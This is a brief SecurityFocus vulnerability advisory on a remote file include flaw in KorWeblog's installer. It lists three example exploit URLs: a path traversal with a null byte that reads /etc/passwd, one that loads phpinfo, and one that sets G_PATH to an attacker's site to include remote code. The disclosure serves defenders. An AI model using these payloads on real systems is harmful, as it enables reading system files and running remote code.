KorWeblog Remote File Include Vulnerability

The following examples were provided:

http://www.example.com/weblog/install/index.php?lng=../../../../../../etc/passwd%00

http://www.example.com/weblog/install/index.php?lng=../../phpinfo

http://www.example.com/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[attacker's site]


 

Privacy Statement
Copyright 2010, SecurityFocus